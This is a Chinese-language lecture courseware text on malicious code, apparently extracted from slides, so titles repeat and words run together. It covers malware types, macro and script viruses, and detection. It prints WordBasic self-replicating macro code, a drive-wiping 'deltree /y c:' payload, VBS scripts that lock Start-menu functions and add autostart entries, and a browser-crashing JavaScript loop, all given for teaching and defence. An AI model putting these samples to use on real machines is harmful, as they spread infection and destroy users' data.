惡意代碼課件

第六章惡意代碼第六章惡意代碼基本內(nèi)容1.概述2.惡意代碼技術(shù)3.計(jì)算機(jī)病毒的原理與防治措施基本內(nèi)容1.概述1986年，報(bào)道了攻擊MicrosoftMS-DOS個(gè)人計(jì)算機(jī)的第一批病毒。先后出現(xiàn)了感染啟動(dòng)扇區(qū)的引導(dǎo)區(qū)病毒、感染可執(zhí)行文件的文件型病毒。1988年出現(xiàn)了第一個(gè)Internet蠕蟲MorrisWorm，導(dǎo)致Internet的通信速度大大地降低。1990年，網(wǎng)上出現(xiàn)了病毒交流布告欄，還出版了第一本關(guān)于病毒編寫的書籍。病毒變得越來越復(fù)雜：病毒開始訪問電子郵件通訊簿，并將其自身發(fā)送到聯(lián)系人；宏病毒將其自身附加到各種辦公類型的文件；此外還出現(xiàn)了專門利用操作系統(tǒng)和應(yīng)用程序漏洞的病毒。1986年，報(bào)道了攻擊MicrosoftMS-DOS個(gè)2.1什么是惡意軟件故意在計(jì)算機(jī)系統(tǒng)上執(zhí)行惡意任務(wù)的病毒、蠕蟲和特洛伊木馬。特洛伊木馬：該程序看上去有用或無害，但包含了旨在利用或損壞運(yùn)行該程序的系統(tǒng)的隱藏代碼；蠕蟲：蠕蟲是能夠自行傳播的惡意代碼，它可以通過網(wǎng)絡(luò)連接自動(dòng)將其自身從一臺(tái)計(jì)算機(jī)分發(fā)到另一臺(tái)計(jì)算機(jī)上。病毒：病毒將其自身附加到宿主程序，在計(jì)算機(jī)之間進(jìn)行傳播。宿主程序執(zhí)行時(shí)，病毒代碼也隨之運(yùn)行，并會(huì)感染新的宿主，條件滿足時(shí)執(zhí)行惡意破壞任務(wù)。2.1什么是惡意軟件故意在計(jì)算機(jī)系統(tǒng)上執(zhí)行惡意任務(wù)的病毒、2.2惡意軟件的特征攻擊目標(biāo)：惡意軟件一般具有相對(duì)固定的攻擊目標(biāo)，可以是特定設(shè)備、特定系統(tǒng)或者特定軟件。設(shè)備某些惡意軟件將一種設(shè)備類型作為專門的攻擊目標(biāo)操作系統(tǒng)惡意軟件可能需要特殊的操作系統(tǒng)才會(huì)有效應(yīng)用程序惡意軟件可能需要在目標(biāo)計(jì)算機(jī)上安裝特定的應(yīng)用程序，才能傳遞負(fù)載或進(jìn)行復(fù)制2.2惡意軟件的特征攻擊目標(biāo)：惡意軟件一般具有相對(duì)固定的2.2惡意軟件的特征攜帶者對(duì)象：如果惡意軟件是病毒，它需要感染攜帶者才能進(jìn)行傳播。攜帶者的數(shù)量和類型隨惡意軟件的不同而不同?？蓤?zhí)行文件：這是通過將其自身附加到宿主程序進(jìn)行復(fù)制的“典型”病毒類型的目標(biāo)對(duì)象腳本：將腳本用作攜帶者目標(biāo)文件的攻擊宏：這些攜帶者是支持特定應(yīng)用程序（例如，字處理器、電子表格或數(shù)據(jù)庫(kù)應(yīng)用程序）的宏腳本語(yǔ)言的文件啟動(dòng)扇區(qū)：計(jì)算機(jī)磁盤（硬盤和可啟動(dòng)的可移動(dòng)媒體）上的特定區(qū)域。此外，有的病毒能同時(shí)將文件和啟動(dòng)扇區(qū)作為感染目標(biāo)和攜帶者。2.2惡意軟件的特征攜帶者對(duì)象：如果惡意軟件是病毒，它需要2.2惡意軟件的特征傳輸機(jī)制：攻擊可以使用一個(gè)或多個(gè)不同方法在計(jì)算機(jī)系統(tǒng)之間傳播和復(fù)制?？梢苿?dòng)媒體：計(jì)算機(jī)病毒和其他惡意軟件最初的、并且可能也是最多產(chǎn)的傳送器（至少到當(dāng)前為止）是文件傳輸。網(wǎng)絡(luò)共享：一旦為計(jì)算機(jī)提供了通過網(wǎng)絡(luò)彼此直接連接的機(jī)制，就會(huì)為惡意軟件編寫者提供另一個(gè)傳輸機(jī)制，而此機(jī)制所具有的潛力可能會(huì)超出可移動(dòng)媒體的能力，從而可以傳播惡意代碼。電子郵件：電子郵件已成為許多惡意軟件攻擊的傳輸機(jī)制。遠(yuǎn)程利用：惡意軟件可能會(huì)試圖利用服務(wù)或應(yīng)用程序中的特定安全漏洞來進(jìn)行復(fù)制2.2惡意軟件的特征傳輸機(jī)制：攻擊可以使用一個(gè)或多個(gè)不同方2.2惡意軟件的特征破壞機(jī)制:一旦惡意軟件通過傳輸?shù)竭_(dá)了宿主計(jì)算機(jī)，它通常會(huì)執(zhí)行一個(gè)稱為“負(fù)載”的操作，負(fù)載可以采用許多形式.后門：這種類型的負(fù)載允許對(duì)計(jì)算機(jī)進(jìn)行未經(jīng)授權(quán)的訪問數(shù)據(jù)損壞或刪除：一種最具破壞性的負(fù)載類型應(yīng)該是損壞或刪除數(shù)據(jù)的惡意代碼，它可以使用戶計(jì)算機(jī)上的信息變得無用信息竊?。阂环N特別令人擔(dān)心的惡意軟件負(fù)載類型是旨在竊取信息的負(fù)載，它通過提供一種將信息傳回惡意軟件作惡者的機(jī)制竊取信息拒絕服務(wù)(DoS)：可以傳遞的一種最簡(jiǎn)單的負(fù)載類型是拒絕服務(wù)攻擊分布式拒絕服務(wù)(DDoS)：DDoS攻擊是一種拒絕服務(wù)攻擊，其中攻擊者使用各種計(jì)算機(jī)上安裝的惡意代碼來攻擊單個(gè)目標(biāo)2.2惡意軟件的特征破壞機(jī)制:一旦惡意軟件通過傳輸?shù)竭_(dá)了2.2惡意軟件的特征觸發(fā)機(jī)制:觸發(fā)機(jī)制是惡意軟件的一個(gè)特征，惡意軟件使用此機(jī)制啟動(dòng)復(fù)制或負(fù)載傳遞手動(dòng)執(zhí)行:這種類型的觸發(fā)機(jī)制是指由受害者直接執(zhí)行惡意軟件半自動(dòng)執(zhí)行:這種類型的觸發(fā)機(jī)制最初由受害者啟動(dòng)，之后則自動(dòng)執(zhí)行自動(dòng)執(zhí)行:這種類型的觸發(fā)機(jī)制根本無須手動(dòng)執(zhí)行定時(shí)炸彈:這種類型的觸發(fā)機(jī)制在一段時(shí)間之后執(zhí)行操作觸發(fā)條件:這種類型的觸發(fā)機(jī)制使用某個(gè)預(yù)先確定的條件作為觸發(fā)器來傳遞其負(fù)載2.2惡意軟件的特征觸發(fā)機(jī)制:觸發(fā)機(jī)制是惡意軟件的一個(gè)特征2.2惡意軟件的特征防護(hù)機(jī)制：許多惡意軟件使用某種類型的防護(hù)機(jī)制，來降低被發(fā)現(xiàn)和刪除的可能性。裝甲：這種類型的防護(hù)機(jī)制使用某種試圖防止對(duì)惡意代碼進(jìn)行分析的技術(shù)竊?。簮阂廛浖褂么祟惣夹g(shù)，通過截獲信息請(qǐng)求并返回錯(cuò)誤數(shù)據(jù)來隱藏其自身加密：使用此防護(hù)機(jī)制的惡意軟件加密其自身或負(fù)載（有時(shí)甚至加密其他系統(tǒng)數(shù)據(jù)）寡態(tài):此特征的惡意軟件使用加密防護(hù)機(jī)制進(jìn)行自身防護(hù)，并且可以將加密例程更改為只能使用固定的次數(shù)（通常數(shù)目很?。６鄳B(tài):這種類型的惡意軟件使用加密防護(hù)機(jī)制更改其自身，以免被檢測(cè)出來。2.2惡意軟件的特征防護(hù)機(jī)制：許多惡意軟件使用某種類型的防2.3什么不是惡意軟件玩笑軟件玩笑應(yīng)用程序旨在生成一個(gè)微笑，或在最糟糕的情況下浪費(fèi)某人的時(shí)間。這些應(yīng)用程序自從人們開始使用計(jì)算機(jī)以來就一直存在。它們不是出于邪惡的目的而被開發(fā)的，而且很明白地標(biāo)識(shí)為玩笑，因此并不被認(rèn)為是惡意軟件惡作劇通常情況下，欺騙某人為您做事要比編寫軟件使人在不知情的情況下做事容易。因此，在IT行業(yè)可以看到大量的惡作劇。2.3什么不是惡意軟件玩笑軟件2.3什么不是惡意軟件欺詐實(shí)際上，違法者已經(jīng)使用過各種通信形式，試圖欺騙人們執(zhí)行會(huì)給其帶來某些經(jīng)濟(jì)利益的操作。Internet、網(wǎng)站和電子郵件都不例外。一個(gè)比較常見的示例是，違法者發(fā)送電子郵件，試圖欺騙收件人透露個(gè)人信息（例如，銀行帳戶信息），然后將這些信息用于非法用途。垃圾郵件（Spam）垃圾郵件是未經(jīng)請(qǐng)求,不請(qǐng)自來的電子郵件，用于為某些服務(wù)或產(chǎn)品做廣告。它通常被認(rèn)做是討厭的東西，垃圾郵件不是惡意軟件,但垃圾郵件數(shù)量的飛速增長(zhǎng)已經(jīng)成為Internet基礎(chǔ)結(jié)構(gòu)的一個(gè)問題，這可導(dǎo)致員工工作效率的降低，因?yàn)樗麄兠刻毂仨氋M(fèi)力查看并刪除此類郵件。2.3什么不是惡意軟件欺詐2.3什么不是惡意軟件間諜軟件此類軟件有時(shí)也稱為“spybot”或“跟蹤軟件”。間諜軟件使用其他形式的欺騙性軟件和程序，它們?cè)跊]有獲取用戶相應(yīng)許可的情況下即在計(jì)算機(jī)上執(zhí)行某些活動(dòng)。這些活動(dòng)可以包括收集個(gè)人信息，以及更改Internet瀏覽器配置設(shè)置。除了令人討厭之外，間諜軟件還會(huì)導(dǎo)致各種問題，從降低計(jì)算機(jī)的總體性能到侵犯?jìng)€(gè)人隱私。廣告軟件廣告軟件通常與宿主應(yīng)用程序組合在一起，只要用戶同意接受廣告軟件即可免費(fèi)提供宿主應(yīng)用程序。因?yàn)閺V告軟件應(yīng)用程序通常在用戶接受說明應(yīng)用程序用途的許可協(xié)議之后進(jìn)行安裝，因而不會(huì)給用戶帶來任何不快。但彈出式廣告會(huì)非常令人討厭，并且在某些情況下會(huì)降低系統(tǒng)性能。2.3什么不是惡意軟件間諜軟件2.3什么不是惡意軟件InternetCookieInternetCookie是由用戶所訪問的網(wǎng)站放置在用戶計(jì)算機(jī)上的文本文件。Cookie包含與用戶相關(guān)的標(biāo)識(shí)信息，并將該信息提供給網(wǎng)站，然后網(wǎng)站將這些信息（連同站點(diǎn)要保留的、與用戶訪問相關(guān)的任何其他信息）放置在用戶計(jì)算機(jī)上。Cookie是合法工具，許多網(wǎng)站使用它們跟蹤訪問者的信息2.3什么不是惡意軟件InternetCookie計(jì)算機(jī)病毒計(jì)算機(jī)病毒是一個(gè)指令序列，它能夠把自身的拷貝插入到其他宿主程序中；計(jì)算機(jī)病毒是隱藏在計(jì)算機(jī)系統(tǒng)的數(shù)據(jù)資源中，利用系統(tǒng)數(shù)據(jù)資源進(jìn)行繁殖并生存，并能影響計(jì)算機(jī)系統(tǒng)正常運(yùn)行的并通過系統(tǒng)數(shù)據(jù)共享進(jìn)行傳染的程序。我國(guó)：“計(jì)算機(jī)病毒，是指編制或者在計(jì)算機(jī)程序中插入的破壞計(jì)算機(jī)功能或者毀壞數(shù)據(jù)，影響計(jì)算機(jī)使用，并能自我復(fù)制的一組計(jì)算機(jī)指令或者程序代碼?！庇?jì)算機(jī)病毒計(jì)算機(jī)病毒是一個(gè)指令序列，它能夠把自身的拷貝插入到病毒的結(jié)構(gòu)所有計(jì)算機(jī)病毒都是由三部分組成的，即病毒引導(dǎo)模塊、病毒傳染模塊和病毒表現(xiàn)模塊病毒的結(jié)構(gòu)所有計(jì)算機(jī)病毒都是由三部分組成的，即病毒引導(dǎo)模塊、病毒的分類按攻擊對(duì)象分類攻擊x86系列機(jī)的病毒這種病毒的種類最多，這是由于PC機(jī)及DOS/Windows操作系統(tǒng)的廣泛使用以及軟件硬件資料的開放性所決定的。攻擊Macintosh系列機(jī)的病毒Apple公司生產(chǎn)的Macintosh系列計(jì)算機(jī)的應(yīng)用也比較廣泛，所以也出現(xiàn)了一些攻擊Macintosh的病毒，如Score病毒、NVIR病毒等等。攻擊Unix操作系統(tǒng)的病毒目前大、中、小型機(jī)以及工作站大都采用Unix系統(tǒng)，特別是網(wǎng)絡(luò)環(huán)境中，攻擊Unix系統(tǒng)的病毒對(duì)計(jì)算機(jī)信息系統(tǒng)也構(gòu)成了嚴(yán)重威脅。病毒的分類按攻擊對(duì)象分類按鏈接方式分類操作系統(tǒng)病毒:操作系統(tǒng)病毒在傳染時(shí)，用自己的運(yùn)行邏輯取代操作系統(tǒng)的正常邏輯模塊。外殼型病毒:外殼型病毒是將病毒本身包圍在宿主程序周圍對(duì)原來的程序不作修改。入侵型病毒:入侵型病毒是將病毒本身插入到攻擊目標(biāo)之中而不是鏈接在它的首部或尾部。一旦病毒程序入侵到一個(gè)程序之中，就很難被發(fā)現(xiàn)，隱蔽性很好，即使發(fā)現(xiàn)后也難以清除，但它能夠傳染的對(duì)象受到了一定的限制。源碼病毒:主要是利用Java、VBS、ActiveX等網(wǎng)絡(luò)編程語(yǔ)言編寫，放在電子郵件的附件或者HTML主頁(yè)中，進(jìn)入被感染計(jì)算機(jī)中執(zhí)行。按鏈接方式分類按傳染對(duì)象分類引導(dǎo)型病毒：引導(dǎo)型病毒的全部或部分寄生在磁盤引導(dǎo)區(qū)中，并且只傳染磁盤引導(dǎo)區(qū)。文件型病毒：這類病毒以可執(zhí)行文件作為傳染對(duì)象，在運(yùn)行被傳染的可執(zhí)行文件時(shí)，病毒程序的引導(dǎo)代碼在正常程序之前獲得控制權(quán)。宏病毒：它的傳染對(duì)象是Windows系統(tǒng)中Word、Excel、Access、PowerPoint等文檔。按傳染對(duì)象分類引導(dǎo)型病毒：引導(dǎo)型病毒的全部或部分寄生在磁盤宏病毒實(shí)例Word宏：office宏是微軟公司為其OFFICE軟件包設(shè)計(jì)的一個(gè)特殊功能，軟件設(shè)計(jì)者為了讓人們?cè)谑褂密浖M(jìn)行工作時(shí)，避免一再地重復(fù)相同的動(dòng)作而設(shè)計(jì)出來的一種工具。在word6.0和offfice95中，編寫宏主要使用WordBasic語(yǔ)言，使用這些宏命令可以編寫病毒的安裝、傳播、和破壞的宏。從office97之后，WordBasic逐漸被宏語(yǔ)言VBA所取代，VBA適用于所有應(yīng)用程序，包括Word、Excel、PowerPoint、Access、Outlook以及Project。這樣，用戶無論是在Excel中，還是在Word中以至是在Access中建立和管理VBA都具有統(tǒng)一的方法和標(biāo)準(zhǔn)。VBA包含一個(gè)由對(duì)象構(gòu)成的層次結(jié)構(gòu)，每個(gè)對(duì)象都包含一組方法和屬性，大部分的WordBasic命令可以在VBA下以WordBasic對(duì)象的方法的方式運(yùn)行，也有一些命令沒有直接對(duì)應(yīng)的方法。宏病毒實(shí)例Word宏：office宏是微軟公司為其OFFI3.1宏病毒在Word啟動(dòng)時(shí)，自動(dòng)加載Startup模板及Normal.dot模板以及它們所包含的宏。如果將自己定義的宏取為特定的名稱，就可以變?yōu)樽詣?dòng)宏，從而在特定時(shí)機(jī)自動(dòng)執(zhí)行宏名運(yùn)行條件AutoExec啟動(dòng)Word時(shí)AutoNew每次新建文檔時(shí)AutoOpen每次打開已有文檔時(shí)AutoClose每次關(guān)閉文檔時(shí)AutoExit退出Word時(shí)FileOpen文件被打開時(shí)FileSave文件被保存時(shí)FileSaveAs文件被另存時(shí)3.1宏病毒在Word啟動(dòng)時(shí)，自動(dòng)加載Startup模板及宏病毒的分類宏病毒是能夠循環(huán)復(fù)制自身的，具有破壞作用的一個(gè)或多個(gè)宏的集合。目前常見的宏病毒根據(jù)破壞性主要有以下幾種：只進(jìn)行自身的傳播，并不具有破壞性的類型。只對(duì)用戶進(jìn)行騷擾，但不破壞系統(tǒng)的類型。使打印中途中斷或打印出混亂信息的類型。極具破壞性的類型。如MDMA．A(無政府者一號(hào))，這種病毒既傳染中文版Word，又傳染英文版Word，發(fā)作時(shí)間是每月的1日。破壞性表現(xiàn)為在機(jī)器的批處理文件Autoexec．bat中加入“deltree／yc：”一句，機(jī)器在下一次啟動(dòng)后就將自動(dòng)刪除C盤上的所有文件。另外有一種雙棲復(fù)合型病毒，如Nuclear病毒，是由AutoExec、Dropsuriv、Fileexit等9種宏病毒復(fù)合成的一種DOS和Windows雙棲型駐留宏病毒。Nuclear發(fā)作時(shí)將一個(gè)名為ph33r的病毒傳染到計(jì)算機(jī)上并激活，清除機(jī)器中的MSDOS.SYS、IO.SYS和COMMAND.COM文件，使計(jì)算機(jī)癱瘓，這種病毒在每年的4月5日發(fā)作。宏病毒的分類宏病毒是能夠循環(huán)復(fù)制自身的，具有破壞作用的一個(gè)或宏病毒的特征由于宏病毒利用了Word的文檔機(jī)制進(jìn)行傳播，寄生于Word的文檔中，它不感染EXE和COM文件，只感染文檔文件。特點(diǎn)：傳播極快。制作、變種方便。破壞可能性極大。WordBasic以及VBA語(yǔ)言提供了許多系統(tǒng)級(jí)底層調(diào)用，如直接使用DOS系統(tǒng)命令調(diào)用WindowsAPI、DLL等。這些操作均可能對(duì)系統(tǒng)直接構(gòu)成威脅。宏病毒的特征由于宏病毒利用了Word的文檔機(jī)制進(jìn)行傳播，寄生宏病毒實(shí)例宏病毒實(shí)例OnErrorGotoAbortiMacroCount=CountMacros(0,0)Fori=1ToiMacroCountIfMacroName$(i,0,0)=”PayLoad”ThenbInstalled=-1EndIfNextI病毒安裝:通過文檔傳染系統(tǒng)的過程可以定義autoopen或者FileOpen宏實(shí)現(xiàn)

OnErrorGotoAbort病毒安裝:通過文檔傳染IfNotbInstalledThenFN$=FileName$()Macros=FN$+"PayLoad"MacroCopyMacro$,"PayLoad"Macro$=FN$+"FileOpen"MacroCopyMacro$,"FileOpen"Macro$=FN$+"FileSaveAs"MacroCopyMacroS,"FileSaveAs"Macro$=FN$+"AutoExec"MacroCopyMacro$,"AutoExec"EndIfAbort:EndSubIfNotbInstalledThenDimdlgAsFileSaveAsGetCurValuesdlgDialogdlgsMc$=FileName$()If(dlg.Format=0)Or(dlg.Format=l)ThenMacroCopy"FileSaveAs",sMc$+":FileSaveAsMacroCopy"FileSave",sMc$+":FileSave"MacroCopy"PayLoad",sMc$+":PayLoad"MacroCopy"FileOpen",sMc$+":FileOpen"dlg.Format=1//表示作為模板保存EndIfFileSaveAsdlg//做實(shí)際的保存EndSub病毒復(fù)制:使用FileSave和PileSaveAs宏將模板中的宏拷貝到文檔中

DimdlgAsFileSaveAs病毒復(fù)制:使用Fi病毒破壞可以使用宏命令編寫任意的破壞代碼，比如格式化硬盤等，也可以用宏調(diào)用外部病毒或者一些木馬程序。例如：在FileClose宏中寫下如下指令：MsgBox(“Youareinfected,HaHa”)病毒破壞可以使用宏命令編寫任意的破壞代碼，比如格式化硬盤等，宏病毒的預(yù)防和清除檢查是否存在“可疑”的宏。所謂可疑的宏，是指用戶自己沒有編制過，也不是Word默認(rèn)提供的，而是新出現(xiàn)的宏，尤其對(duì)以“Auto”開頭的宏，應(yīng)當(dāng)高度警惕。對(duì)于已被傳染病毒的文件首先將Normal.dot中的自動(dòng)宏清除(AutoOpen、AutoClose、AutoNew等)，然后將Normal.dot置成只讀方式。為防止Word系統(tǒng)被感染，DOS的Autoexec．bat和Config.sys文件最好也都設(shè)為只讀屬性；由于宏病毒是通過自動(dòng)執(zhí)行宏的方式來激活、傳染和破壞的，所以將自動(dòng)執(zhí)行宏屏蔽掉，Word就不會(huì)自動(dòng)執(zhí)行宏。文檔中或Word系統(tǒng)即使有宏病毒存在，但由于無法被激活，也就無法傳染和破壞，起到了防毒的效果。具體方法是：在Normal.dot中編寫名為“AutoExec”的自動(dòng)執(zhí)行宏，內(nèi)容為DisableAutoMacros。在打開文件時(shí)，按住Shift鍵可以阻止自動(dòng)宏的運(yùn)行。宏病毒的預(yù)防和清除檢查是否存在“可疑”的宏。所謂可疑的宏，3.2腳本病毒腳本病毒是目前最流行的計(jì)算機(jī)病毒，通常利用網(wǎng)絡(luò)介質(zhì)進(jìn)行傳播和破壞系統(tǒng)資源，具有破壞性強(qiáng)、傳播速度快、變種類型多、代碼編寫容易等特點(diǎn)。3.2腳本病毒腳本病毒是目前最流行的計(jì)算機(jī)病毒，通常利用腳本程序的執(zhí)行離不開WSH(WindowsScriptHost，Windows腳本宿主)環(huán)境，WSH為宿主腳本創(chuàng)建環(huán)境。WSH是微軟提供的一種基于32位Windows平臺(tái)的、與語(yǔ)言無關(guān)的腳本解釋機(jī)制，它使得腳本能夠直接在Windows桌面或命令提示符下運(yùn)行。利用WSH，用戶能夠操縱WSH對(duì)象、ActiveX對(duì)象、注冊(cè)表和文件系統(tǒng)，還可訪問活動(dòng)目錄服務(wù)。腳本程序的執(zhí)行離不開WSH(WindowsScriptH網(wǎng)頁(yè)惡意代碼病毒消耗系統(tǒng)資源。通過不斷消耗本機(jī)系統(tǒng)資源，使計(jì)算機(jī)不能處理其他進(jìn)程，導(dǎo)致系統(tǒng)與網(wǎng)絡(luò)癱瘓。這類病毒大都是利用JavaScript產(chǎn)生一個(gè)死循環(huán)，它可以在有惡意的網(wǎng)站中出現(xiàn)，也可以被當(dāng)做郵件的附件發(fā)給用戶，當(dāng)用戶打開htm、vbs附件時(shí)，屏幕出現(xiàn)無數(shù)個(gè)瀏覽器窗口，最后不得不關(guān)機(jī)重新啟動(dòng)；非法向用戶的硬盤寫入文件。最近有部分個(gè)人主頁(yè)或郵件含有可以格式化本地硬盤的惡意代碼；IE泄密。利用IE5.0的漏洞，網(wǎng)頁(yè)可以讀取客戶機(jī)的文件，攻擊者獲取用戶帳號(hào)與密碼。利用郵件非法安裝木馬。網(wǎng)頁(yè)惡意代碼病毒消耗系統(tǒng)資源。通過不斷消耗本機(jī)系統(tǒng)資源，使計(jì)一個(gè)示意性的惡意網(wǎng)頁(yè)代碼，該程序利用死循環(huán)的原理，交叉顯示紅色和黑色，造成刺眼的效果，該代碼可以使IE5.0崩潰。<html><body>Test<script>varcolor=newArray;color[1]="black";color[2]="red";for(x=2;x<3;x++){document.bgColor=color[x];//設(shè)置背景色if(x==2){x=0;}//造成死循環(huán)}</script><body></html>一個(gè)示意性的惡意網(wǎng)頁(yè)代碼，該程序利用死循環(huán)的原理，交叉顯示紅攻擊注冊(cè)表的惡意腳本注冊(cè)表的相關(guān)操作:創(chuàng)建一個(gè)能與操作系統(tǒng)溝通的對(duì)象

DimOperationRegistrySetOperationRegistry=WScript.CreateObject("WScript.Shell")RegRead：讀操作RegRead主要是用來讀取注冊(cè)表中主鍵的默認(rèn)值或鍵值，例如：Read_Data1=OperationRegistry.RegRead("HKCR\xxx\")RegWrite：寫操作RegWrite主要是用來在注冊(cè)表中新建主鍵或鍵值，并賦予給它們一個(gè)初始值。OperationRegistry.RegWrite"HKCR\xxx\value",1,"REG_DWORD"RegDelete：刪除操作RegDelete主要是用來刪除注冊(cè)表中已存在的主鍵或鍵值，同讀操作類似需要指定鍵路徑。攻擊注冊(cè)表的惡意腳本注冊(cè)表的相關(guān)操作:操作注冊(cè)表的腳本程序?qū)嵗?腳本文件名ChangeStartMenu.vbs

SubChange(Argument)ChangeStartMenu.RegWriteRegPath&Argument,Key_Data,Type_NameMsgBox("Success!")EndSubDimChangeStartMenuSetChangeStartMenu=WScript.CreateObject("WScript.Shell")RegPath="HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\”Type_Name="REG_DWORD"Key_Data=1操作注冊(cè)表的腳本程序?qū)嵗?腳本文件名ChangeStartMStartMenu_Run="NoRun"StartMenu_Find="NoFind"StartMenu_Close="NoClose"CallChange(StartMenu_Run)'禁用“開始”菜單中的“運(yùn)行”功能CallChange(StartMenu_Find)'禁用“開始”菜單中的“查找”功能CallChange(StartMenu_Close)'禁用“開始”菜單中的“關(guān)閉系統(tǒng)”功能StartMenu_Run="NoRun"向Windows中添加自啟動(dòng)程序，使得該程序能在開機(jī)時(shí)自動(dòng)運(yùn)行。向Windows中添加自啟動(dòng)程序，使得該程序能在開機(jī)時(shí)自動(dòng)運(yùn)'腳本文件名為AddAutoRunProgram.vbs'假設(shè)要添加的自啟動(dòng)程序?yàn)閏:\myfile\myautorun.exeDimAutoRunProgramSetAutoRunProgram=WScript.CreateObject("WScript.Shell")RegPath="HKLM\Software\Microsoft\Windows\CurrentVersion\Run\"Type_Name="REG_SZ"Key_Name="AutoRun"Key_Data="C:\myfile\myautorun.exe"'該自啟動(dòng)程序的全路徑文件名AutoRunProgramReg.WriteRegPath&Key_Name,Key_Data,Type_Name'在啟動(dòng)組中添加自啟動(dòng)程序myautorun.exeMsgBox("Success!")'腳本文件名為AddAutoRunProgram.vbsIE相關(guān)的注冊(cè)表項(xiàng)

設(shè)置IE的默認(rèn)連接首頁(yè)鍵值：HKLM\SOFTWARE\Microsoft\InternetExplorer\Main\StartPageHKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main例如：將鍵值設(shè)置為“”，在打開IE窗口時(shí)將顯示“百度”的首頁(yè)。IE相關(guān)的注冊(cè)表項(xiàng)

設(shè)置IE的默認(rèn)連接首頁(yè)不允許修改IE的起始頁(yè)通過修改注冊(cè)表鍵值，不允許用戶修改起始頁(yè)。涉及的注冊(cè)表鍵值是：HKEY_CURRENT_USER\Software\Policies\Microsoft\InternetExplorer\ControlPanel下的homepage鍵值。原來的鍵值為“0”，被修改后為“1”，這時(shí)“IE選項(xiàng)”中的“使用默認(rèn)值”按鈕為灰色，不可用。不允許修改IE的起始頁(yè)注冊(cè)表解鎖：注冊(cè)表被鎖是病毒攻擊常用的手段，在輸入命令regedit時(shí)，注冊(cè)表不能夠使用，并發(fā)現(xiàn)系統(tǒng)提示你沒有權(quán)限運(yùn)行該程序。HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System下的DWORD值DisableRegistryTools被修改為1的緣故，將其值恢復(fù)為0即可恢復(fù)注冊(cè)表編輯器的使用。用文本編輯器編寫一個(gè)文件，命名為后綴為“.reg”的文件。對(duì)Windows2000文件的內(nèi)容如下：WindowsRegistryEditorVersion5.00[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]”DisableRegistryTools”=DWORD:00000000注冊(cè)表解鎖：注冊(cè)表被鎖是病毒攻擊常用的手段，在輸入命令reg腳本病毒的預(yù)防與清除方法一：通過將Windows安裝的組件“WindowsScriptingHost”卸載，來阻止VBS腳本程序執(zhí)行。方法二：通過改變VBS文件打開方式來阻止VBS腳本程序的執(zhí)行。默認(rèn)情況下VBS腳本文件使用wscrip.exe來打開并解釋執(zhí)行的，因此只要將VBS腳本文件改為用“記事本”notepad.exe來打開，那就不會(huì)感染這類病毒了。方法三：腳本用戶可在運(yùn)行腳本之前驗(yàn)證其真實(shí)性。腳本開發(fā)人員對(duì)其腳本進(jìn)行簽名，以免發(fā)生未經(jīng)授權(quán)的修改。管理員可以強(qiáng)制實(shí)施嚴(yán)格的策略，確定哪些用戶有權(quán)修改本地或遠(yuǎn)程運(yùn)行腳本。腳本病毒的預(yù)防與清除方法一：通過將Windows安裝的組件計(jì)算機(jī)病毒的防治技術(shù)“防毒”即防止病毒侵入，根據(jù)系統(tǒng)的應(yīng)用環(huán)境采取相應(yīng)的系統(tǒng)安全措施預(yù)防病毒侵入計(jì)算機(jī)；“查毒”即發(fā)現(xiàn)病毒的能力。檢查在特定環(huán)境中是否存在病毒，并能夠準(zhǔn)確地報(bào)出病毒名稱，檢查的對(duì)象可能是內(nèi)存、文件(可執(zhí)行文件、Word文件、VBS文件及其他)、磁盤引導(dǎo)區(qū)等。查毒率和誤報(bào)率是查毒能力的兩個(gè)重要指標(biāo)?！皻⒍尽奔辞宄《镜哪芰?。根據(jù)不同類型病毒的感染方式，需要采取不同的方法進(jìn)行恢復(fù)。將病毒從感染對(duì)象中清除以后，要求恢復(fù)到被感染之前的狀態(tài)。計(jì)算機(jī)病毒的防治技術(shù)“防毒”即防止病毒侵入，根據(jù)系統(tǒng)的應(yīng)用檢測(cè)病毒的方法特征代碼法：特征代碼法是使用最多的方法之一，被早期應(yīng)用于SCAN、CPAV、KV系列等著名病毒檢測(cè)工具中。一般認(rèn)為特征代碼法是檢測(cè)已知病毒的最簡(jiǎn)單、開銷最小的方法。（1）采集已知病毒樣本；（2）在病毒樣本中，提取特征代碼。（3）將特征代碼納入病毒特征數(shù)據(jù)庫(kù)。（4）打開被檢測(cè)文件，在文件中搜索，檢查文件中是否含有病毒數(shù)據(jù)庫(kù)中的病毒特征代碼。（5）出現(xiàn)新病毒后，重復(fù)第1~3步，將該病毒的特征代碼納入病毒數(shù)據(jù)庫(kù)，更新版本。檢測(cè)病毒的方法特征代碼法：特征代碼法是使用最多的方法之一校驗(yàn)和法:在文件被感染前，根據(jù)文件的內(nèi)容計(jì)算其校驗(yàn)和，將該校驗(yàn)和保存在其他文件中。在每次使用文件時(shí)，讀出文件的內(nèi)容并重新計(jì)算校驗(yàn)和，比較與原來保存值是否一致，若不一致就可以認(rèn)為文件被感染。也可以定期地對(duì)文件進(jìn)行校驗(yàn)。優(yōu)點(diǎn)：校驗(yàn)和法既可發(fā)現(xiàn)已知病毒又可發(fā)現(xiàn)未知病毒。缺點(diǎn)：只能判斷出文件是否被修改，而不能識(shí)別病毒種類，也不能報(bào)出病毒名稱。另一方面，由于病毒感染并非文件內(nèi)容改變的惟一原因，文件內(nèi)容的改變也可能是其他情況引起的。在這種情況下就會(huì)產(chǎn)生誤報(bào)警。校驗(yàn)和法對(duì)隱蔽性病毒無效。隱蔽性病毒進(jìn)駐內(nèi)存后，會(huì)自動(dòng)剝?nèi)ト径境绦蛑械牟《敬a，使校驗(yàn)和法受騙，對(duì)一個(gè)有毒文件算出正常校驗(yàn)和。校驗(yàn)和法:在文件被感染前，根據(jù)文件的內(nèi)容計(jì)算其校驗(yàn)和，將該校行為監(jiān)測(cè)法：利用病毒的特有行為的特殊性來監(jiān)測(cè)病毒的方法，稱為行為監(jiān)測(cè)法。通過對(duì)病毒的深入分析和總結(jié)，發(fā)現(xiàn)一些病毒的共同行為，而且這些行為具有特殊性，不會(huì)在正常程序中出現(xiàn)，或者比較罕見。在程序運(yùn)行過程中，監(jiān)視其行為，與事先總結(jié)出的行為特征進(jìn)行匹配，如果發(fā)現(xiàn)了病毒行為，立即報(bào)警。行為監(jiān)測(cè)法：利用病毒的特有行為的特殊性來監(jiān)測(cè)病毒的方法，稱3.3蠕蟲計(jì)算機(jī)蠕蟲是一種可